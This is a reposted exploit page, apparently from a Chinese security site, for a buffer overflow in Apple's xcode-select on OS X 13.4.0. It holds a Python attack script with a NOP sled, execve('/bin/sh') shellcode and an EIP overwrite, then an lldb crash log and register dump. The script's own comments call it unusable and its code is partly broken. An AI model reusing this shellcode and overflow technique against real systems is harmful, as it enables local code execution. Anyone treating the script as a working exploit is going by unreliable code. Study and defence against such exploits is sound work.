首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
xcode-select 13.4.0 Buffer Overflow
来源:vfocus.net 作者:Sacco 发布时间:2014-09-24  
# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls  the  location  of  the developer
directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD
development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None

junk = "\x90"*5631
shellcode =
"\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"
#OSX/x86 intel - execve(/bin/sh) - 24 bytes

buffer = "\x90\x90\x90\x90"*89
eip = "\x7f\xff\x8e\x19\x98\x66"

print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"

try:
    subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "xcode-select not found!"
    else:
    print "Error executing exploit"
    raise

Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
    frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866:  jae    0x7fff8e199870            ; __pthread_kill + 20
   0x7fff8e199868:  movq   %rax, %rdi
   0x7fff8e19986b:  jmpq   0x7fff8e196175            ; cerror_nocancel
   0x7fff8e199870:  ret
(lldb)

(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
    frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
    frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
    frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
    frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
    frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
    frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
    frame #8: 0x0000000100006315
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
    frame #9: 0x0000000100000e75
xcode-select`___lldb_unnamed_function3$xcode-select + 57
    frame #10: 0x0000000100001562
xcode-select`___lldb_unnamed_function5$xcode-select + 1083a

(lldb) register r -a
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x00007fff769df310  libsystem_pthread.dylib`_thread
       rcx = 0x00007fff5fbfce18
       rdx = 0x0000000000000000
       rdi = 0x0000000000000d0b
       rsi = 0x0000000000000006
       rbp = 0x00007fff5fbfce40
       rsp = 0x00007fff5fbfce18
       r8 = 0x00000000fffffc00
        r9 = 0x00007fff5fbfce00
       r10 = 0x0000000008000000
       r11 = 0x0000000000000206
       r12 = 0x0000000000000400
       r13 = 0x000000000000000e
       r14 = 0x0000000000000006
       r15 = 0x00007fff5fbfd120
       rip = 0x00007fff8e199866  libsystem_kernel.dylib`__pthread_kill + 10
    rflags = 0x0000000000000206
        cs = 0x0000000000000007
        fs = 0x0000000000000000
        gs = 0x0000000000030000
       eax = 0x00000000
       ebx = 0x769df310
       ecx = 0x5fbfce18
       edx = 0x00000000
       edi = 0x00000d0b
       esi = 0x00000006
       ebp = 0x5fbfce40
       esp = 0x5fbfce18
       r8d = 0xfffffc00
       r9d = 0x5fbfce00
      r10d = 0x08000000
      r11d = 0x00000206
      r12d = 0x00000400
      r13d = 0x0000000e
      r14d = 0x00000006
      r15d = 0x5fbfd120

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fast Image Resizer 098 - Local
·WS10 Data Server SCADA Exploit
·Joomla Face Gallery 1.0 Multip
·ZyXEL Prestig P-660HNU-T1 ISP
·Joomla Mac Gallery <= 1.5 Arbi
·EMC AlphaStor Device Manager O
·GetSimpleCMS PHP File Upload
·Advantech WebAccess dvs.ocx Ge
·Seafile-server <= 3.1.5 - Remo
·Bash Code Injection Proof Of C
·Oracle MyOracle Filter Bypass
·Bash Environment Variable Comm
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved